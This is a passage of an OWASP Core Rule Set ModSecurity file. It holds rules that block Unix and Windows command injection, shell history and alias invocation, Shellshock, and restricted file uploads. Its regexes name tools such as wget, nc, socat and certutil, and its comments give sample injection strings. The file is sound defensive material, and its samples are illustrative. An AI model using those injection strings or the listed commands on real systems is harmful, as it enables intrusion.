(?i)(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[arx])?|(?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|x)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|[ckz][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)|f[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dg]|g[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?g)|(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?
p|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:s|z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?4)?)|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)?|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|(?:s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?h|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m)[\s\v&\)<>\|]" \ + "id:932250,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Direct Unix Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ Unix command injection ] +# +# This rule complements rule 932250 for 
commands of 4 characters and up. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932260.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932260 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:a(?:ddgroup|xel)|b(?:ase(?:32|64|nc)|lkid|sd(?:cat|iff|tar)|u(?:iltin|nzip2|sybox)|yobu|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:h(?:g(?:passwd|rp)|pass|sh)|lang\+\+|o(?:mm[\s\v&\)<>\|]|proc)|ron)|d(?:iff[\s\v&\)<>\|]|mesg|oas)|e(?:2fsck|grep)|f(?:grep|iletest|tp(?:stats|who))|g(?:r(?:ep[\s\v&\)<>\|]|oupmod)|unzip|z(?:cat|exe|ip))|htop|l(?:ast(?:comm|log(?:in)?)|ess(?:echo|(?:fil|pip)e)|ftp(?:get)?|osetup|s(?:-F|b_release|cpu|mod|of|pci|usb)|wp-download|z(?:4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:ilq|ster\.passwd)|k(?:fifo|nod|temp)|locate|ysql(?:admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:\.(?:openbsd|traditional)|at)|et(?:(?:c|st)at|kit-ftp|plan)|ohup|ping|stat)|onintr|p(?:dksh|erl5?|(?:ft|gre)p|hp(?:-cgi|[57])|igz|k(?:exec|ill)|(?:op|se)d|rint(?:env|f[\s\v&\)<>\|])|tar(?:diff|grep)?|wd\.db|ython[2-3])|r(?:(?:bas|ealpat)h|m(?:dir[\s\v&\)<>\|]|user)|nano|sync)|s(?:diff|e(?:ndmail|t(?:env|sid))|ftp|(?:h\.distri|pwd\.d)b|ocat|td(?:err|in|out)|udo|ysctl)|t(?:ailf|c(?:p(?:ing|traceroute)|sh)|elnet|imeout[\s\v&\)<>\|]|raceroute6?)|u(?:n(?:ame|lz(?:4|ma)|(?:pig|x)z|rar|zstd)|ser(?:(?:ad|mo)d|del))|vi(?:gr|pw)|w(?:get|hoami)|x(?:args|z(?:c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more))|z(?:c(?:at|mp)|diff|[e-f]?grep|ip(?:c(?:loak|mp)|d
etails|grep|info|(?:merg|not)e|split|tool)|less|more|run|std(?:(?:ca|m)t|grep|less)?))" \ + "id:932260,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Direct Unix Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{TX.932260_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.932260_matched_var_name=%{matched_var_name}',\ + chain" + SecRule MATCHED_VAR "!@rx [0-9]\s*\'\s*[0-9]" \ + "t:none,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ Unix shell history invocation ] +# +# Detects Unix shell history invocations in any context. +# +# Example: +# GET /?rce=example.com +# GET /?rce=curl%20 +# GET /?rce=!-1!-2 +# +# Will execute `curl example.com`. We should be able to detect the '!-' sequence with a very low risk of false-positives since the sequence is very specific +# and does not allow for whitespaces in between. 
+# +# This rule has stricter siblings: +# * 932331 (PL3) +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx !-\d" \ + "id:932330,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix shell history invocation',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Unix shell snippets ] +# +# Detect some common sequences found in shell commands and scripts. +# +# Some commands which were restricted in earlier rules due to FP, +# have been added here with their full path, in order to catch some +# cases where the full path is sent. 
+# +# Rule relations: +# +# .932160 (base rule, PL1, unix shell commands with full path) +# ..932161 (stricter sibling, PL2, unix shell commands with full path in User-Agent and Referer request headers) +# +# This rule is also triggered by an Apache Struts Remote Code Execution exploit: +# [ Apache Struts vulnerability CVE-2017-9805 - Exploit tested: https://www.exploit-db.com/exploits/42627 ] +# +# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: +# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] + +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile unix-shell.data" \ + "id:932160,\ + phase:2,\ + block,\ + capture,\ + t:none,t:cmdLine,t:normalizePath,\ + msg:'Remote Command Execution: Unix Shell Code Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Shellshock vulnerability (CVE-2014-6271 and CVE-2014-7169) ] +# +# Detect exploitation of "Shellshock" GNU Bash RCE vulnerability. +# +# Based on ModSecurity rules created by Red Hat. 
+# Permission for use was granted by Martin Prpic +# +# https://access.redhat.com/articles/1212303 +# +SecRule REQUEST_HEADERS|REQUEST_LINE "@rx ^\(\s*\)\s+{" \ + "id:932170,\ + phase:1,\ + block,\ + capture,\ + t:none,t:urlDecode,\ + msg:'Remote Command Execution: Shellshock (CVE-2014-6271)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+{" \ + "id:932171,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecode,t:urlDecodeUni,\ + msg:'Remote Command Execution: Shellshock (CVE-2014-6271)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Unix shell alias detection ] +# +# Detects Unix shell alias invocations in any context. +# +# Example: +# GET /?rce=alias%20a=b +# +# Shell aliasing can be performed to substitute anything in commands, escaping +# +# References: https://pubs.opengroup.org/onlinepubs/007904975/basedefs/xbd_chap03.html#tag_03_10 : +# "In the shell command language, a word consisting solely of underscores, digits, and alphabetics +# from the portable character set and any of the following characters: '!', '%', ',', '@'." 
+# +# Implementations may allow other characters within alias names as an extension. +# +# Regular expression generated from regex-assembly/932175.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932175 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \ba[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s\b[\s\v]+[!-\"%',0-9@-Z_a-z]+=[^\s\v]" \ + "id:932175,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix shell alias invocation',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ Restricted File Upload ]=- +# +# Detects attempts to upload a file with a forbidden filename. +# +# Many application contain Unrestricted File Upload vulnerabilities. +# https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload +# +# These might be abused to upload configuration files or other files +# that affect the behavior of the web server, possibly causing remote +# code execution. 
+# +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X-File-Name \ + "@pmFromFile restricted-upload.data" \ + "id:932180,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Restricted File Upload Attempt',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Windows command injection ] +# +# This rule detects Windows shell command injections. +# If you are not running Windows, it is safe to disable this rule. +# +# New in CRSv4: The rules 932110 and 932115 were reorganized and renumbered to 932370 and 932380. +# The new rules target specific Windows binaries to simplify future updates of the command list. +# +# A command injection takes a form such as: +# +# foo.jpg&ver /r +# foo.jpg|ver /r +# +# The vulnerability exists when an application executes a shell command +# without proper input escaping/validation. +# +# To prevent false positives, we look for a 'starting sequence' that +# precedes a command in CMD syntax, such as: ; | & ` +# +# Anatomy of the regexp: +# +# 1. Starting tokens +# +# ; ;cmd +# \{ {cmd +# \| |cmd +# \|\| ||cmd +# & &cmd +# && &&cmd +# \n \ncmd +# \r \rcmd +# ` `cmd +# +# 2. Command prefixes +# +# ( (cmd) +# , ,cmd +# @ @cmd +# ' 'cmd' +# " "cmd" +# \s spacing+cmd +# +# 3. Paths +# +# [\w'\"\./]+/ /path/cmd +# [\x5c'\"\^]*\w[\x5c'\"\^]*:.*\x5c C:\Program Files\cmd +# [\^\.\w '\"/\x5c]*\x5c)?[\"\^]* \\net\share\dir\cmd +# +# 4. Quoting +# +# \" "cmd" +# \^ ^cmd +# +# 5. Extension/switches +# +# \.[\"\^]*\w+ cmd.com, cmd.exe, etc. 
+# /b cmd/h +# +# An effort is made to combat evasions by CMD syntax; for example, +# the following strings are valid: c^md, @cmd, "c"md. ModSecurity +# has a t:cmdLine transformation built-in to deal with some of these, +# but unfortunately, that transformation replaces ';' characters (so +# we cannot match on the start of a command) and '\' characters (so we +# have trouble matching paths). This makes the regexp more complex. +# +# This rule is case-insensitive. +# +# Regular expression generated from regex-assembly/932370.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932370 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:t[\"\^]*i[\"\^]*m[\"\^]*e|[\n\r;`\{]|\|\|?|&&?)[\s\v]*[\s\v\"'-\(,@]*(?:[\"'\.-9A-Z_a-z]+/|(?:[\"'\x5c\^]*[0-9A-Z_a-z][\"'\x5c\^]*:.*|[ \"'\.-9A-Z\x5c\^-_a-z]*)\x5c)?[\"\^]*(?:a[\"\^]*(?:c[\"\^]*c[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*c[\"\^]*k[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*s[\"\^]*o[\"\^]*l[\"\^]*e|d[\"\^]*(?:p[\"\^]*l[\"\^]*u[\"\^]*s|v[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k)|(?:g[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*c[\"\^]*u[\"\^]*t[\"\^]*o|s[\"\^]*p[\"\^]*n[\"\^]*e[\"\^]*t[\"\^]*_[\"\^]*c[\"\^]*o[\"\^]*m[\"\^]*p[\"\^]*i[\"\^]*l[\"\^]*e)[\"\^]*r|p[\"\^]*p[\"\^]*(?:i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*l[\"\^]*l[\"\^]*e[\"\^]*r|v[\"\^]*l[\"\^]*p)|t[\"\^]*(?:[\s\v,\.-/;-<>].*|b[\"\^]*r[\"\^]*o[\"\^]*k[\"\^]*e[\"\^]*r))|b[\"\^]*(?:a[\"\^]*s[\"\^]*h|g[\"\^]*i[\"\^]*n[\"\^]*f[\"\^]*o|i[\"\^]*t[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|c[\"\^]*(?:d[\"\^]*b|e[\"\^]*r[\"\^]*t[\"\^]*(?:o[\"\^]*c|r[\"\^]*e[\"\^]*q|u[\"\^]*t[\"\^]*i[\"\^]*l)|l[\"\^]*_[\"\^]*(?:i[\"\^]*n[\"\^]*v[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n|l[\"\^]*o[\"\^]*a[\"\^]*d[\"\^]*a[\"\^]*s[\"\^]*s[\"\^]*e[\"\^]*m[\"\^]*b[\"\^]*l[\"\^]*y|m[\"\^]*u[\"\^]*t[\"\^]*e[
\"\^]*x[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*i[\"\^]*f[\"\^]*i[\"\^]*e[\"\^]*r[\"\^]*s)|m[\"\^]*(?:d(?:[\"\^]*(?:k[\"\^]*e[\"\^]*y|l[\"\^]*3[\"\^]*2))?|s[\"\^]*t[\"\^]*p)|o[\"\^]*(?:m[\"\^]*s[\"\^]*v[\"\^]*c[\"\^]*s|n[\"\^]*(?:f[\"\^]*i[\"\^]*g[\"\^]*s[\"\^]*e[\"\^]*c[\"\^]*u[\"\^]*r[\"\^]*i[\"\^]*t[\"\^]*y[\"\^]*p[\"\^]*o[\"\^]*l[\"\^]*i[\"\^]*c[\"\^]*y|h[\"\^]*o[\"\^]*s[\"\^]*t|t[\"\^]*r[\"\^]*o[\"\^]*l)|r[\"\^]*e[\"\^]*g[\"\^]*e[\"\^]*n)|r[\"\^]*e[\"\^]*a[\"\^]*t[\"\^]*e[\"\^]*d[\"\^]*u[\"\^]*m[\"\^]*p|s[\"\^]*(?:c(?:[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)?|i)|u[\"\^]*s[\"\^]*t[\"\^]*o[\"\^]*m[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l[\"\^]*h[\"\^]*o[\"\^]*s[\"\^]*t)|d[\"\^]*(?:a[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*v[\"\^]*c[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|e[\"\^]*(?:f[\"\^]*a[\"\^]*u[\"\^]*l[\"\^]*t[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k|s[\"\^]*k(?:[\"\^]*t[\"\^]*o[\"\^]*p[\"\^]*i[\"\^]*m[\"\^]*g[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n[\"\^]*l[\"\^]*d[\"\^]*r)?|v[\"\^]*(?:i[\"\^]*c[\"\^]*e[\"\^]*c[\"\^]*r[\"\^]*e[\"\^]*d[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*i[\"\^]*a[\"\^]*l[\"\^]*d[\"\^]*e[\"\^]*p[\"\^]*l[\"\^]*o[\"\^]*y[\"\^]*m[\"\^]*e[\"\^]*n[\"\^]*t|t[\"\^]*o[\"\^]*o[\"\^]*l[\"\^]*s[\"\^]*l[\"\^]*a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*r))|f[\"\^]*s[\"\^]*(?:h[\"\^]*i[\"\^]*m|v[\"\^]*c)|i[\"\^]*(?:a[\"\^]*n[\"\^]*t[\"\^]*z|s[\"\^]*k[\"\^]*s[\"\^]*h[\"\^]*a[\"\^]*d[\"\^]*o[\"\^]*w)|n[\"\^]*(?:s[\"\^]*c[\"\^]*m[\"\^]*d|x)|o[\"\^]*t[\"\^]*n[\"\^]*e[\"\^]*t|u[\"\^]*m[\"\^]*p[\"\^]*6[\"\^]*4|x[\"\^]*c[\"\^]*a[\"\^]*p)|e[\"\^]*(?:s[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*u[\"\^]*t[\"\^]*l|v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*v[\"\^]*w[\"\^]*r|x[\"\^]*(?:c[\"\^]*e[\"\^]*l|p[\"\^]*(?:a[\"\^]*n[\"\^]*d|l[\"\^]*o[\"\^]*r[\"\^]*e[\"\^]*r)|t[\"\^]*(?:e[\"\^]*x[\"\^]*p[\"\^]*o[\"\^]*r[\"\^]*t|r[\"\^]*a[\"\^]*c[\"\^]*3[\"\^]*2)))|f[\"\^]*(?:i[\"\^]*n[\"\^]*(?:d[\"\^]*s[\"\^]*t|g[\"\^]*e)[\"\^]*r|l[\"\^]*t[\"\^]*m[\"\^]*c|o[\"\^]*r[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s|s[\"\^]*(?:i(?:[\"\^]*a[\"\^]*n[\"\^]*y[\"\^]*c[\"
\^]*p[\"\^]*u)?|u[\"\^]*t[\"\^]*i[\"\^]*l)|t[\"\^]*p)|g[\"\^]*(?:f[\"\^]*x[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n[\"\^]*l[\"\^]*o[\"\^]*a[\"\^]*d[\"\^]*w[\"\^]*r[\"\^]*a[\"\^]*p[\"\^]*p[\"\^]*e[\"\^]*r|p[\"\^]*s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)|h[\"\^]*h|i[\"\^]*(?:e[\"\^]*(?:4[\"\^]*u[\"\^]*i[\"\^]*n[\"\^]*i[\"\^]*t|a[\"\^]*d[\"\^]*v[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k|e[\"\^]*x[\"\^]*e[\"\^]*c|f[\"\^]*r[\"\^]*a[\"\^]*m[\"\^]*e)|l[\"\^]*a[\"\^]*s[\"\^]*m|m[\"\^]*e[\"\^]*w[\"\^]*d[\"\^]*b[\"\^]*l[\"\^]*d|n[\"\^]*(?:f[\"\^]*d[\"\^]*e[\"\^]*f[\"\^]*a[\"\^]*u[\"\^]*l[\"\^]*t[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*l|s[\"\^]*t[\"\^]*a[\"\^]*l[\"\^]*l[\"\^]*u[\"\^]*t[\"\^]*i)[\"\^]*l)|j[\"\^]*s[\"\^]*c|l[\"\^]*(?:a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*-[\"\^]*v[\"\^]*s[\"\^]*d[\"\^]*e[\"\^]*v[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l|d[\"\^]*i[\"\^]*f[\"\^]*d[\"\^]*e)|